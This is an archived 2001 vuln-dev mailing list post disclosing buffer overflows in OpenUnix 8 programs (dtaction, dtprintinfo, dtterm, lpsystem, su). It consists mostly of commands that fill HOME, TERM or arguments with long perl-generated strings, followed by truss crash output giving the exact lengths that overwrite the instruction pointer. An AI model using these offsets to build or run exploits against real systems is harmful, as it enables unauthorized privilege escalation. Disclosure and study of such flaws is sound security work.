Fwd: Returned post -- OpenUnix 8 lpsystem , su and DT overflows lengths to eip

From: dotslash@snosoft.com
Date: 10/27/01

• Previous message: Andreas Hasenack: "Re: PGP sign highlight on mutt"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Fri, 26 Oct 2001 15:43:34 -0700
Subject: Fwd: Returned post -- OpenUnix 8 lpsystem , su and DT overflows lengths to eip
From: dotslash@snosoft.com
To: vuln-dev@security-focus.com
Message-Id: <E33149F6-CA62-11D5-AEED-00039305969A@snosoft.com>

>> Sorry if this has already made it to this list... I have been getting
>> lots of listserv replys it doesn't seem to like my mail client.

>>
>> I have had several people ask for the exact lengths on the OpenUnix 8
>> DT
>> overflows below is some debugging information
>> to help out. (Davor sorry I sent this to a list... but for some reason
>> I can't mail you)
>>
>> -KF
>>
>>
>> # HOME=`perl -e 'print "A" x 1036'`
>> # export HOME
>> # truss dtaction a
>> Segmentation Fault
>> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> *** process killed ***
>>
>> # HOME=`perl -e 'print "A" x 1035'`
>> # export HOME
>> # turss dtaction a
>> Segmentation Fault
>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> *** process killed ***
>> -------------------------------------------------------------------------------------------------
>> # HOME=`perl -e 'print "A" x 1036'`
>> # export HOME
>> # truss dtprintinfo
>> Segmentation Fault
>> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> *** process killed ***
>>
>> # HOME=`perl -e 'print "A" x 1035'`
>> # export HOME
>> # truss dtprintinfo
>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> *** process killed ***
>>
>> ------------------------------------------------------------------------------------------------
>>
>> # HOME=`perl -e 'print "A" x 1035'`
>> # export HOME
>> # truss dtterm
>> Segmentation Fault
>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> *** process killed ***
>>
>> # HOME=`perl -e 'print "A" x 1036'`
>> # export HOME
>> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> *** process killed ***
>> ------------------------------------------------------------------------------------------------
>>
>> # truss lpsystem `perl -e 'print "A" x 2190'`
>> Incurred fault #6, FLTBOUNDS %pc = 0x08077B40
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141
>> *** process killed ***
>>
>> # truss lpsystem `perl -e 'print "A" x 2192'`
>> Incurred fault #6, FLTBOUNDS %pc = 0x08077B40
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> *** process killed ***
>>
>> --------------------------------------------------------------------------------------------------
>> # TERM=`perl -e 'print "A" x 1632'`
>> # export TERM
>> # truss /bin/su -
>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> *** process killed ***
>>
>> -------------------------------------------------------------------------------------------------
>> (no eip hit here
>> # TERM=`perl -e 'print "A" x 1264'`
>> # export TERM
>> # /sbin/su -
>> # exit
>> # TERM=`perl -e 'print "A" x 1265'`
>> # export TERM
>> # /sbin/su -
>> Segmentation Fault - core dumped
>>
>>
>>
>>
>>
>>

---

• Previous message: Andreas Hasenack: "Re: PGP sign highlight on mutt"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > vuln-dev  > 2001-10